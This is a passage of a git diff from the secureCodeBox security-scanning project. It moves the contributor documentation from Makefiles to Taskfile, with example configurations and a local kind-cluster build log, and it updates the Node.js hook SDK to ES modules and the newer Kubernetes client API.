├── values.yaml -├── Makefile +├── Taskfile.yaml ├── README.md ├── .helm-docs.gotmpl ├── .helmignore diff --git a/documentation/docs/contributing/integrating-a-scanner/integration-tests.md b/documentation/docs/contributing/integrating-a-scanner/integration-tests.md index ce6655b826..fc28beb34f 100644 --- a/documentation/docs/contributing/integrating-a-scanner/integration-tests.md +++ b/documentation/docs/contributing/integrating-a-scanner/integration-tests.md @@ -40,7 +40,7 @@ test( } `); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); ``` @@ -61,7 +61,7 @@ higher than the timeout provided above. ## Run your integration tests locally -Before pushing them to the repository, make sure your tests run successfully in your local cluster. You may use the [makefile](/docs/contributing/integrating-a-scanner/makefile) to run your integration tests locally. +Before pushing them to the repository, make sure your tests run successfully in your local cluster. You may use the [Taskfile](/docs/contributing/integrating-a-scanner/taskfile) to run your integration tests locally. ## Integrate in ci.yaml diff --git a/documentation/docs/contributing/integrating-a-scanner/makefile.md b/documentation/docs/contributing/integrating-a-scanner/makefile.md index 940cf2edd3..cedcfb1247 100644 --- a/documentation/docs/contributing/integrating-a-scanner/makefile.md +++ b/documentation/docs/contributing/integrating-a-scanner/makefile.md @@ -3,77 +3,123 @@ # # SPDX-License-Identifier: Apache-2.0 -title: Makefile +title: Taskfile sidebar_position: 4 --- -To test your scanner locally, you may use the following makefile. +To test your scanner locally, you'll use a Taskfile.yaml configuration. The secureCodeBox project has migrated from Makefiles to [Task](https://taskfile.dev/) for better maintainability and cross-platform support. -```makefile -#!/usr/bin/make -f +## Basic Scanner Taskfile -include_guard = set # Always include this line (checked in the makefile framework) -scanner = angularjs-csti-scanner # The name of your scanner -custom_scanner = set # Include this line if your scanner has a dockerfile +Create a `Taskfile.yaml` in your scanner directory with the following content: -include ../../scanners.mk # Ensures that all the default makefile targets are included +```yaml +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: your-scanner-name # Replace with your scanner's name + +tasks: {} ``` -See [Local Deployment](/docs/contributing/local-deployment) for examples how to use the Makefiles. +This minimal configuration includes all the common tasks defined in the parent Taskfile and sets your scanner name as a variable. + +## Available Tasks + +| Task | Description | +|------------------------|----------------------------------------------------------------------------| +| build | Builds your parser (& scanner if custom scanner is defined) | +| deploy | Deploys your scanner helm chart into your local kind cluster | +| predeploy | Can be overridden to perform any pre-deployment steps | +| test:unit | Run your parser unit tests | +| test:integration | Run integration tests for your scanner | +| test:helm | Run helm tests for your scanner | +| test | Run all tests (unit, helm, and integration) | -## Available makefile targets +## Running Tests -| Target | Use | -| --------------------------------- | ------------------------------------------------------------------------------------ | -| reset-integration-tests-namespace | Resets the integration-tests namespace | -| unit-tests | Run your parser unit tests | -| docker-build | Builds your parser (& scanner) | -| docker-export | Exports your parser (& scanner) into a .tar file | -| kind-import | Loads your parser (& scanner) .tar files into your local kind cluster | -| deploy | Deploys your scanner helm chart into your local kind cluster | -| deploy-test-deps | Deploys your scanner's test dependencies (demo-targets) into your local kind cluster | -| integration-tests | Deletes all scans and runs your integration test `scanners/SCANNER_NAME.test.js` | +To run tests for your scanner, you can use the following commands: -## Configuring your makefile (examples) +```bash +# Run only unit tests +task test:unit -### Adding test dependencies (demo-targets) +# Run only integration tests +task test:integration + +# Run all tests (unit, helm, and integration) +task test +``` -```makefile -#!/usr/bin/make -f +## Customizing Your Taskfile -include_guard = set -scanner = wpscan +### Adding Custom Tasks -include ../../scanners.mk +You can add custom tasks specific to your scanner by defining them in the `tasks` section: -deploy-test-deps: deploy-test-dep-old-wordpress +```yaml +tasks: + custom-task: + desc: "My custom task description" + cmds: + - echo "Running custom task for my scanner" ``` -This adds the old-wordpress demo-target to your integration tests. You can find all available demo-targets in `common.mk`. +### Customizing Deployment -### Overriding helm deploy configurations +If you need to customize the deployment process, you can override the `predeploy` task: -```makefile -#!/usr/bin/make -f -include_guard = set -scanner = nmap -custom_scanner = set +```yaml +tasks: + predeploy: + desc: "Prepare environment for scanner deployment" + cmds: + - kubectl create namespace my-scanner-tests --dry-run=client -o yaml | kubectl apply -f - + - helm -n my-scanner-tests upgrade --install juice-shop ../../demo-targets/juice-shop/ --wait +``` + +### Adding Test Dependencies + +To add test dependencies (demo-targets), you can create a custom task that runs before the integration tests: + +```yaml +tasks: + deploy-test-deps: + desc: "Deploy test dependencies for my scanner" + cmds: + - kubectl create namespace my-scanner-tests --dry-run=client -o yaml | kubectl apply -f - + - helm -n my-scanner-tests upgrade --install juice-shop ../../demo-targets/juice-shop/ --wait +``` + +### Overriding Helm Deploy Configurations + +You can customize the Helm deployment by setting additional variables: + +```yaml +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: my-scanner + additionalHelmInstallArgsForScanner: "--set=scanner.env.MY_VAR=my-value" +``` -include ../../scanners.mk +## Testing Environment Setup -deploy-with-scanner: - @echo ".: 💾 Deploying custom '$(scanner)' scanner HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install $(scanner) ./ --wait \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-$(scanner)" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="scanner.image.repository=docker.io/$(IMG_NS)/$(scanner-prefix)-$(scanner)" \ - --set="scanner.image.tag=$(IMG_TAG)" +Before running integration tests, make sure you have set up the testing environment: -deploy-test-deps: - # If not exists create namespace where the tests will be executed - kubectl create namespace nmap-tests --dry-run=client -o yaml | kubectl apply -f - - # Install jshop in nmap-tests namespace - helm -n nmap-tests upgrade --install juice-shop ../../demo-targets/juice-shop/ --wait +```bash +# From the project root directory +task prepare-testing-env ``` -Furthermore, it overrides the deploy-test-deps target such that juice-shop is installed in the correct namespace (nmap-tests). +This will create a kind cluster and deploy the secureCodeBox operator. diff --git a/documentation/docs/contributing/integrating-a-scanner/parser-dir.md b/documentation/docs/contributing/integrating-a-scanner/parser-dir.md index 58dfcac0c0..5c0ac46331 100644 --- a/documentation/docs/contributing/integrating-a-scanner/parser-dir.md +++ b/documentation/docs/contributing/integrating-a-scanner/parser-dir.md @@ -20,7 +20,7 @@ FROM node:22-alpine as build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM securecodebox/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ @@ -45,7 +45,7 @@ See [Local Deployment](/docs/contributing/local-deployment) for instructions on To create a parser for your scanner you will have to execute the following steps in the parser directory: -### Create a new package.json (using `npm init`) +### Create a new package.json (using `npm init`) (if you require external dependencies) Your `package.json` should look something like this: @@ -67,7 +67,10 @@ Your `package.json` should look something like this: } ``` -### Install The Dependencies +Note: you only need this if you require dependencies (e.g. a XML parser) which aren't build into node.js. +If you do not need dependencies you should not create a package.json and remove the build step from the Dockerfile. It's unended overhead. + +#### Install The Dependencies If you need additional dependencies you can install them via `npm install`. @@ -76,11 +79,9 @@ If you need additional dependencies you can install them via `npm install`. Create a `parser.js` file and update the parser function of the Parser SDK. A starting point would be: ```javascript -async function parse(fileContent) { +export async function parse(fileContent) { return []; } - -module.exports.parse = parse; ``` After your scanner has finished, the Parser SDK will retrieve the output results and call your custom parse function `parse`. The SDK expects a finding object as specified in [Finding | secureCodeBox](/docs/api/finding). The `id`, `parsed_at` and `identified_at` fields can be omitted, as they will be added by the Parser SDK. @@ -90,9 +91,7 @@ After your scanner has finished, the Parser SDK will retrieve the output results Please provide some tests for your parser in the `parser.test.js` file. To make sure that the output complies with the format specified in [Finding | secureCodeBox](/docs/api/finding) you should call the method `validateParser(parseResult)` from the ParserSDK and assert that it must resolve (not throw errors). You can do so e.g. by calling the following code. See the already existing parsers for reference. ```javascript -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -100,4 +99,4 @@ await expect(validateParser(findings)).resolves.toBeUndefined(); If you need additional files for your test please save these in the `__testFiles__` directory. Please take a look at [Integration Tests | secureCodeBox](/docs/contributing/integrating-a-scanner/integration-tests) for more information. -Assuming you've set up the scanner [makefile](/docs/contributing/integrating-a-scanner/makefile), you can run your unit test with `make unit-tests`. +Assuming you've set up the scanner [Taskfile](/docs/contributing/integrating-a-scanner/taskfile), you can run your unit test with `task test:unit`. diff --git a/documentation/docs/contributing/integrating-a-scanner/taskfile.md b/documentation/docs/contributing/integrating-a-scanner/taskfile.md new file mode 100644 index 0000000000..57a58e0e49 --- /dev/null +++ b/documentation/docs/contributing/integrating-a-scanner/taskfile.md @@ -0,0 +1,131 @@ +--- +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +title: Taskfile +sidebar_position: 4 +--- + +To test your scanner locally, you'll use a Taskfile.yaml configuration. The secureCodeBox project has migrated from Makefiles to [Task](https://taskfile.dev/) for better maintainability and cross-platform support. + +## Basic Scanner Taskfile + +Create a `Taskfile.yaml` in your scanner directory with the following content: + +```yaml +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: your-scanner-name # Replace with your scanner's name + +tasks: {} +``` + +This minimal configuration includes all the common tasks defined in the parent Taskfile and sets your scanner name as a variable. + +## Available Tasks + +| Task | Description | +|------------------------|----------------------------------------------------------------------------| +| build | Builds your parser (& scanner if custom scanner is defined) | +| deploy | Deploys your scanner helm chart into your local kind cluster | +| predeploy | Can be overridden to perform any pre-deployment steps | +| test:unit | Run your parser unit tests | +| test:integration | Run integration tests for your scanner | +| test:helm | Run helm tests for your scanner | +| test | Run all tests (unit, helm, and integration) | + +## Running Tests + +To run tests for your scanner, you can use the following commands: + +```bash +# Run only unit tests +task test:unit + +# Run only integration tests +task test:integration + +# Run only helm unit tests +task test:helm + +# Run all tests (unit, helm, and integration) +task test +``` + +## Customizing Your Taskfile + +### Adding Custom Tasks + +You can add custom tasks specific to your scanner by defining them in the `tasks` section: + +Generally we try to keep all the tasks for scanner and hooks standardized for easier maintenance. + +```yaml +tasks: + custom-task: + desc: "My custom task description" + cmds: + - echo "Running custom task for my scanner" +``` + +### Customizing Deployment + +If you need to customize the deployment process, you can override the `predeploy` task: + +```yaml +tasks: + predeploy: + desc: "Prepare environment for scanner deployment" + cmds: + - kubectl apply -f ./integration-tests/configmap-wordlist.yaml -n integration-tests +``` + +### Adding Test Dependencies + +To add test dependencies (demo-targets), you can call the demo-target deploy tasks which are automatically available. + +```yaml +tasks: + predeploy: + desc: "Prepare environment for scanner deployment" + deps: + - demo-targets:deploy:bodgeit + - demo-targets:deploy:juice-shop + # see demo-targets/Taskfile.yaml for all available demo targets. (the task needs to be prefixed here with the `demo-target:` namespace) +``` + +### Overriding Helm Deploy Configurations + +You can customize the Helm deployment by setting additional variables: + +```yaml +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: my-scanner + additionalHelmInstallArgsForScanner: | + --set="helmValue.enabled=false" \ # needs to end in a backslash as its inserted into a multi line bash +``` + +## Testing Environment Setup + +Before running integration tests, make sure you have set up the testing environment: + +```bash +# From the project root directory +task prepare-testing-env +``` + +This will create a kind cluster and deploy the secureCodeBox operator. \ No newline at end of file diff --git a/documentation/docs/contributing/local-deployment.md b/documentation/docs/contributing/local-deployment.md index 9b445fcb8a..fd4151197b 100644 --- a/documentation/docs/contributing/local-deployment.md +++ b/documentation/docs/contributing/local-deployment.md @@ -9,117 +9,170 @@ sidebar_position: 3 If you are integrating a new scanner or hook and want to test from a local build, this document will guide you through it. For simplicity's sake, this guide is written only for local cluster setups using [kind](https://kind.sigs.k8s.io/). -Other setups (e.g., minikube, Docker Desktop's integrated Kubernetes) are possible but might require extra setup and tweaking efforts to run with our make files. +Other setups (e.g., minikube, Docker Desktop's integrated Kubernetes) are possible but might require extra setup and tweaking efforts to run with our task files. We also assume that you are or have followed the steps in either the [Integrating A Scanner](/docs/contributing/integrating-a-scanner) or [Integrating A Hook](/docs/contributing/integrating-a-hook) guide. ## Kind Cluster Setup -1. Firstly, create the kind cluster: `kind create cluster` -2. Install the secureCodeBox operator. See [installation](/docs/getting-started/installation/) -3. Create the `integration-tests` namespace: `kubectl create namespace integration-tests` +Easiest way to setup a kind cluster for running secureCodeBox for local development is to use the task `task prepare-testing-env` command. +This will start a kind cluster with the name testing-env and build the operator and deploy it to the cluster. +IF you intent to use it to run the integration tests for a scanner or hook you can skip this as the test:integration tasks will automatically set this up too, if it isn't already running. -## Makefile-based build & deploy (recommended) +## Taskfile-based build & deploy (recommended) -To make local testing easier, the secureCodeBox team has provided a Makefile based solution. The specific Make targets and examples to customize them are given in these documents: +To make local testing easier, the secureCodeBox team has provided a Taskfile based solution. The specific Task targets and examples to customize them are given in these documents: -- [Makefile targets scanners](/docs/contributing/integrating-a-scanner/makefile) -- [Makefile targets hooks](/docs/contributing/integrating-a-hook/makefile) +- [Taskfile targets scanners](/docs/contributing/integrating-a-scanner/taskfile) +- [Taskfile targets hooks](/docs/contributing/integrating-a-hook/taskfile) This document explains how to use these targets to deploy your scanner locally. **Scanner only:** -1. Inspect your scanner's Makefile. - If your scanner uses a remote Docker image (such as one hosted on Dockerhub), you can comment out or remove the `custom_scanner` line. +1. Inspect your scanner's Taskfile.yaml. + If your scanner uses a remote Docker image (such as one hosted on Dockerhub), the `hasCustomScanner` variable will automatically be set to false. If you have defined your own Dockerfile in the `scanner/` directory, you should leave the line as-is. 2. In the root of the secureCodeBox git repository, under `hook-sdk/nodejs/` and `parser-sdk/nodejs/`, you need to build the Dockerfiles. This ensures that you have the latest version of the SDK available locally. You need this in order to build secureCodeBox parsers and hooks. To build the image: - **Kind**: run `make docker-build`. + **Kind**: run `task build`. 3. In your scanner or hook directory, build the Dockerfiles: - **Kind**: run `make docker-build docker-export kind-import`. + **Kind**: run `task build`. -4. Run `make deploy` to install your Helm chart in your active Kubernetes cluster into the `integration-tests` namespace. - The make target ensures that the image name and tag matches that built in the previous step. +4. Run `task deploy` to install your Helm chart in your active Kubernetes cluster into the `integration-tests` namespace. + The task ensures that the image name and tag matches that built in the previous step. 5. Now run an example scan and inspect whether the images are correctly used. ### Example shell ```shell -securecodebox$ kind create cluster -Creating cluster "kind" ... - ✓ Ensuring node image (kindest/node:v1.27.3) 🖼 - ✓ Preparing nodes 📦 - ✓ Writing configuration 📜 - ✓ Starting control-plane 🕹️ - ✓ Installing CNI 🔌 - ✓ Installing StorageClass 💾 -Set kubectl context to "kind-kind" -[...] -securecodebox$ helm repo add secureCodeBox https://charts.securecodebox.io -[...] -securecodebox$ kubectl create namespace securecodebox-system -namespace/securecodebox-system created -securecodebox$ helm --namespace securecodebox-system upgrade --install securecodebox-operator oci://ghcr.io/securecodebox/helm/operator +securecodebox$ task prepare-testing-env +task: [create-kind-cluster] echo "Starting kind cluster for testing environment" +Starting kind cluster for testing environment +task: [create-kind-cluster] kind create cluster --name testing-env +Creating cluster "testing-env" ... + ✓ Ensuring node image (kindest/node:v1.33.1) 🖼 + ✓ Preparing nodes 📦 + ✓ Writing configuration 📜 + ✓ Starting control-plane 🕹️ + ✓ Installing CNI 🔌 + ✓ Installing StorageClass 💾 +Set kubectl context to "kind-testing-env" +You can now use your cluster with: + +kubectl cluster-info --context kind-testing-env + +Have a nice day! 👋 +task: [build-lurker-image] echo "Building lurker image with tag ${IMG_TAG}" +task: [build-operator-image] echo "Building operator image with tag ${IMG_TAG}" +Building lurker image with tag sha-a2d8ce1aa +task: [build-lurker-image] docker build -t ${IMG_NS}/lurker:${IMG_TAG} /src/secureCodeBox/lurker +Building operator image with tag sha-a2d8ce1aa +task: [build-operator-image] docker build -t ${IMG_NS}/operator:${IMG_TAG} /src/secureCodeBox/operator +[+] Building 1.0s (4/4) docker:desktop-linux +[+] Building 1.0s (3/3) docker:desktop-linux + => [internal] load build definition from Dockerfile 0.0s + => [internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 966B 0.0s +[+] Building 1.1s (20/20) FINISHED docker:desktop-linux + => [internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 966B 0.0s + => [internal] load metadata for gcr.io/distroless/static:nonroot 0.4s + => [internal] load metadata for docker.io/library/golang:1.24.2 1.0s + => [auth] library/golang:pull token for registry-1.docker.io 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 291B 0.0s + => [builder 1/11] FROM docker.io/library/golang:1.24.2@sha256:30baaea08c5d1e858329c50f29fe381e9b7d7bced11a0f5f1f69a1504cdfbf5 0.0s + => [stage-1 1/3] FROM gcr.io/distroless/static:nonroot@sha256:627d6c5a23ad24e6bdff827f16c7b60e0289029b0c79e9f7ccd54ae3279fb45f 0.0s + => [internal] load build context 0.0s + => => transferring context: 2.91kB 0.0s + => CACHED [builder 2/11] WORKDIR /workspace 0.0s + => CACHED [builder 3/11] COPY go.mod go.mod 0.0s + => CACHED [builder 4/11] COPY go.sum go.sum 0.0s + => CACHED [builder 5/11] RUN go mod download 0.0s + => CACHED [builder 6/11] COPY main.go main.go 0.0s + => CACHED [builder 7/11] COPY apis/ apis/ 0.0s + => CACHED [builder 8/11] COPY controllers/ controllers/ 0.0s + => CACHED [builder 9/11] COPY internal/ internal/ 0.0s + => CACHED [builder 10/11] COPY utils/ utils/ 0.0s + => CACHED [builder 11/11] RUN CGO_ENABLED=0 go build -a -o manager main.go 0.0s + => CACHED [stage-1 2/3] COPY --from=builder /workspace/manager . 0.0s + => exporting to image 0.0s +[+] Building 1.1s (15/15) FINISHED docker:desktop-linux + => [internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 820B 0.0s + => [internal] load metadata for docker.io/library/golang:1.24.2 1.0s + => [internal] load metadata for gcr.io/distroless/static:nonroot 0.4s + => [internal] load .dockerignore 0.0s + => => transferring context: 171B 0.0s + => [builder 1/11] FROM docker.io/library/golang:1.24.2@sha256:30baaea08c5d1e858329c50f29fe381e9b7d7bced11a0f5f1f69a1504cdfbf5 0.0s + => [stage-1 1/3] FROM gcr.io/distroless/static:nonroot@sha256:627d6c5a23ad24e6bdff827f16c7b60e0289029b0c79e9f7ccd54ae3279fb45f 0.0s + => [internal] load build context 0.0s + => => transferring context: 81B 0.0s + => CACHED [builder 2/11] WORKDIR /workspace 0.0s + => CACHED [builder 3/7] COPY go.mod go.mod 0.0s + => CACHED [builder 4/7] COPY go.sum go.sum 0.0s + => CACHED [builder 5/7] RUN go mod download 0.0s + => CACHED [builder 6/7] COPY main.go main.go 0.0s + => CACHED [builder 7/7] RUN CGO_ENABLED=0 go build -a -o lurker main.go 0.0s + => CACHED [stage-1 2/3] COPY --from=builder /workspace/lurker . 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:5a13c7c870b49203029c1aa85d273e5425ad3e28ca57167c03e822d665db576a 0.0s + => => naming to docker.io/securecodebox/lurker:sha-a2d8ce1aa 0.0s + +View build details: docker-desktop://dashboard/build/desktop-linux/desktop-linux/7zgy8kalere960epa2fpujgb8 + +What's next: + View a summary of image vulnerabilities and recommendations → docker scout quickview + +What's next: + View a summary of image vulnerabilities and recommendations → docker scout quickview +task: [load-operator-image] kind load docker-image ${IMG_NS}/operator:${IMG_TAG} --name testing-env +task: [load-lurker-image] kind load docker-image ${IMG_NS}/lurker:${IMG_TAG} --name testing-env +Image: "securecodebox/lurker:sha-a2d8ce1aa" with ID "sha256:5a13c7c870b49203029c1aa85d273e5425ad3e28ca57167c03e822d665db576a" not yet present on node "testing-env-control-plane", loading... +Image: "securecodebox/operator:sha-a2d8ce1aa" with ID "sha256:d72d1321720f9df4b6ead554c42f09e382ea8be9652a5bcd500cf051e3ca3981" not yet present on node "testing-env-control-plane", loading... +task: [deploy-operator] echo "Deploying secureCodeBox operator to the testing environment" +Deploying secureCodeBox operator to the testing environment +task: [deploy-operator] kubectl config use-context kind-testing-env +Switched to context "kind-testing-env". +task: [deploy-operator] kubectl create namespace integration-tests || true +namespace/integration-tests created +task: [deploy-operator] helm -n securecodebox-system upgrade --create-namespace --install securecodebox-operator /src/secureCodeBox/operator --wait \ + --set="image.repository=docker.io/${IMG_NS}/operator" \ + --set="image.tag=${IMG_TAG}" \ + --set="image.pullPolicy=IfNotPresent" \ + --set="lurker.image.repository=docker.io/${IMG_NS}/lurker" \ + --set="lurker.image.tag=${IMG_TAG}" \ + --set="lurker.image.pullPolicy=IfNotPresent" + Release "securecodebox-operator" does not exist. Installing it now. NAME: securecodebox-operator -LAST DEPLOYED: Fri Jan 26 14:34:50 2024 +LAST DEPLOYED: Fri Jul 11 10:03:12 2025 NAMESPACE: securecodebox-system STATUS: deployed REVISION: 1 TEST SUITE: None NOTES: secureCodeBox Operator Deployed 🚀 -[...] -securecodebox$ kubectl create namespace integration-tests -namespace/integration-tests created -securecodebox$ cd parser-sdk/nodejs/ -securecodebox/parser-sdk/nodejs$ make docker-build -.: ⚙️ Build 'parser-sdk'. -docker build -t securecodebox/parser-sdk-nodejs:"sha-$(git rev-parse --short HEAD)" . -[...] -Successfully built af5faaf0be6e -Successfully tagged securecodebox/parser-sdk-nodejs:sha-a4490167 -securecodebox/parser-sdk/nodejs$ cd ../../scanners/nmap/ -securecodebox/scanners/nmap$ make docker-build docker-export kind-import -.: ⚙️ Build 'nmap' parser with BASE_IMG_TAG: 'sha-a4490167'. -[...] -[Warning] One or more build-args [scannerVersion] were not consumed -Successfully built 931ac83a3e42 -Successfully tagged securecodebox/parser-nmap:sha-a4490167 -.: ⚙️ Build 'nmap' scanner with BASE_IMG_TAG: 'sha-a4490167'. -[...] -[Warning] One or more build-args [baseImageTag namespace] were not consumed -Successfully built 721c154357eb -Successfully tagged securecodebox/scanner-nmap:sha-a4490167 -.: ⚙️ Saving new docker image archive to 'parser-nmap.tar'. -.: ⚙️ Saving new docker image archive to 'scanner-nmap.tar'. -.: 💾 Importing the image archive 'parser-nmap.tar' to local kind cluster. -.: 💾 Importing the image archive 'scanner-nmap.tar' to local kind cluster. -securecodebox/scanners/nmap$ make deploy -.: 💾 Deploying 'nmap' scanner HelmChart with the docker tag 'sha-a4490167' into kind namespace 'integration-tests'. -[...] -Release "nmap" does not exist. Installing it now. -NAME: nmap -LAST DEPLOYED: Fri Jan 26 14:35:27 2024 -NAMESPACE: integration-tests -STATUS: deployed -REVISION: 1 -TEST SUITE: None -securecodebox/scanners/nmap$ kubectl get scantypes.execution.securecodebox.io -n integration-tests -NAME IMAGE -nmap docker.io/securecodebox/scanner-nmap:sha-a4490167 -securecodebox/scanners/nmap$ kubectl get parsedefinitions.execution.securecodebox.io -n integration-tests -NAME IMAGE -nmap-xml docker.io/securecodebox/parser-nmap:sha-a4490167 + +The operator can orchestrate the execution of various security scanning tools inside of your cluster. +You can find a list of all officially supported scanners here: https://www.securecodebox.io/ +The website also lists other integrations, like persisting scan results to DefectDojo or Elasticsearch. + +The operator send out regular telemetry pings to a central service. +This lets us, the secureCodeBox team, get a grasp on how much the secureCodeBox is used. +The submitted data is chosen to be as anonymous as possible. +You can find a complete report of the data submitted and links to the source-code at: https://www.securecodebox.io/docs/telemetry +The first ping is send one hour after the install, you can prevent this by upgrading the chart and setting `telemetryEnabled` to `false`. ``` :::note -Notice that the Make target automatically feeds the chart's `AppVersion` into the `scannerVersion` build arg. +Notice that the Task automatically feeds the chart's `AppVersion` into the `scannerVersion` build arg. ::: ## Manual build & deploy @@ -234,7 +287,7 @@ You can also check if the image is actually available: Don't forget that all images used in your Kubernetes cluster must be either remotely accessible or locally available within the cluster. - **Kind**: imported after building - - Using Makefile: `make docker-export kind-import`. + - Using Taskfile: `task build`. - Manually: `kind load docker-image parser-nmap:[tag]`. ### Namespace diff --git a/documentation/docs/contributing/test-concept/charts-test.md b/documentation/docs/contributing/test-concept/charts-test.md index 3622715e27..3e4c65938f 100644 --- a/documentation/docs/contributing/test-concept/charts-test.md +++ b/documentation/docs/contributing/test-concept/charts-test.md @@ -194,16 +194,29 @@ matches the snapshot: ### Running Tests In the helm-chart folder, run tests with: + ```bash -make helm-unit-tests +task test:helm ``` -or + +or + ```bash helm unittest . ``` + And review the output for any failures. -The `make` command will also run inside the Operator, AutoDiscovery, Scanners, Hooks or Demo-Targets root folders and tests all the Helm Charts in the corresponding folder. +To run all helm unit tests in the secureCodeBox you can use `task test:helm:all`. + +### Updating snapshots + +You can have helm unittest update the snapshots to the current values. +Handy to quickly update them an checking the results in the git diff. + +```bash +helm unittest . --update-snapshot +``` ## CI/CD Integration diff --git a/documentation/docs/contributing/test-concept/hook-test.md b/documentation/docs/contributing/test-concept/hook-test.md index 815e3b2757..1fecc7781c 100644 --- a/documentation/docs/contributing/test-concept/hook-test.md +++ b/documentation/docs/contributing/test-concept/hook-test.md @@ -188,7 +188,7 @@ test("Should create no subsequent scans if there are no rules", () => { To run a unit-test, it suffices to run ```bash -make unit-tests +task test:unit ``` in the hook's directory. @@ -226,7 +226,7 @@ test( high: 1, }); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 } ); ``` @@ -235,12 +235,12 @@ For this test to be considered successful, it has to match the expected conditio To run the test it suffices to run: ```bash -make test +task test ``` All previous tests will be deleted and the current test will be run on a clean slate. If no clean install is needed before running the test, it is possible to run only the tests themselves through: ```bash -make integration-tests +task test:integration ``` diff --git a/documentation/docs/contributing/test-concept/index.md b/documentation/docs/contributing/test-concept/index.md index af59cd4542..f0b9f0d5e9 100644 --- a/documentation/docs/contributing/test-concept/index.md +++ b/documentation/docs/contributing/test-concept/index.md @@ -24,5 +24,5 @@ The following articles describe how each module implements its unit and integrat * [Scanner](/docs/contributing/test-concept/scanner-test) * [Hook](/docs/contributing/test-concept/hook-test) -We use Make as a basis for our testing framework. The Makefiles expect additional software to be installed: -git, node + npm, docker, kind, kubectl, helm and [yq](https://github.com/mikefarah/yq/). +We use [Task](https://taskfile.dev/) as a basis for our testing framework. The Taskfiles expect additional software to be installed: +git, node + npm, bun, docker, kind, kubectl, helm and [yq](https://github.com/mikefarah/yq/). diff --git a/documentation/docs/contributing/test-concept/scanner-test.md b/documentation/docs/contributing/test-concept/scanner-test.md index ddf1ce3c47..831772513a 100644 --- a/documentation/docs/contributing/test-concept/scanner-test.md +++ b/documentation/docs/contributing/test-concept/scanner-test.md @@ -34,7 +34,7 @@ This test for example expects a test file, i.e a raw scanner output, to be found To run a unit-test it suffices to run ```bash -make unit-tests +task test:unit ``` in the scanner directory. @@ -56,7 +56,7 @@ test( ); expect(count).toBeGreaterThanOrEqual(20); }, - 6 * 60 * 1000 + { timeout: 6 * 60 * 1000 }, ); ``` For this test to be considered successful, it has to match the expected condition. In this case, the condition is that the count of the findings is greater or equal to 20. @@ -64,12 +64,12 @@ For this test to be considered successful, it has to match the expected conditio To run the test it suffices to run: ```bash -make test +task test ``` All previous tests will be deleted and the current test will be run on a clean slate. If no clean install is needed before running the test, it is possible to run only the tests themselves through: ```bash -make integration-tests +task test:integration ``` diff --git a/hook-sdk/nodejs/Dockerfile b/hook-sdk/nodejs/Dockerfile index 2c74a94775..8bdfe87495 100644 --- a/hook-sdk/nodejs/Dockerfile +++ b/hook-sdk/nodejs/Dockerfile @@ -5,14 +5,14 @@ FROM node:22-alpine AS build WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM node:22-alpine ARG NODE_ENV RUN addgroup --system --gid 1001 app && adduser app --system --uid 1001 --ingroup app WORKDIR /home/app/hook-wrapper/ COPY --from=build --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ -COPY --chown=root:root --chmod=755 ./hook-wrapper.js ./hook-wrapper.js +COPY --chown=root:root --chmod=755 ./hook-wrapper.js ./package.json ./package-lock.json ./ USER 1001 ENV NODE_ENV=${NODE_ENV:-production} ENTRYPOINT ["node", "/home/app/hook-wrapper/hook-wrapper.js"] diff --git a/hook-sdk/nodejs/hook-wrapper.js b/hook-sdk/nodejs/hook-wrapper.js index 4d71cf81c4..b7a8c0412f 100644 --- a/hook-sdk/nodejs/hook-wrapper.js +++ b/hook-sdk/nodejs/hook-wrapper.js @@ -2,17 +2,21 @@ // // SPDX-License-Identifier: Apache-2.0 -const { handle } = require("./hook/hook"); -const k8s = require("@kubernetes/client-node"); +import { + KubeConfig, + CustomObjectsApi, + setHeaderOptions, + PatchStrategy, +} from "@kubernetes/client-node"; -const scanName = process.env["SCAN_NAME"]; -const namespace = process.env["NAMESPACE"]; -console.log(`Starting hook for Scan "${scanName}"`); +import { handle } from "./hook/hook.js"; -const kc = new k8s.KubeConfig(); +const kc = new KubeConfig(); kc.loadFromCluster(); +const k8sApi = kc.makeApiClient(CustomObjectsApi); -const k8sApi = kc.makeApiClient(k8s.CustomObjectsApi); +const scanName = process.env["SCAN_NAME"]; +const namespace = process.env["NAMESPACE"]; function downloadFile(url) { return fetch(url); @@ -38,6 +42,7 @@ async function uploadFile(url, fileContents) { const response = await fetch(url, { method: "PUT", headers: { "content-type": "" }, + body: fileContents, }); if (!response.ok) { @@ -109,44 +114,44 @@ async function updateFindings(findings) { } await k8sApi.patchNamespacedCustomObjectStatus( - "execution.securecodebox.io", - "v1", - namespace, - "scans", - scanName, { - status: { - findings: { - count: findings.length, - severities: { - informational: severityCount(findings, "INFORMATIONAL"), - low: severityCount(findings, "LOW"), - medium: severityCount(findings, "MEDIUM"), - high: severityCount(findings, "HIGH"), + group: "execution.securecodebox.io", + version: "v1", + namespace, + plural: "scans", + name: scanName, + body: { + status: { + findings: { + count: findings.length, 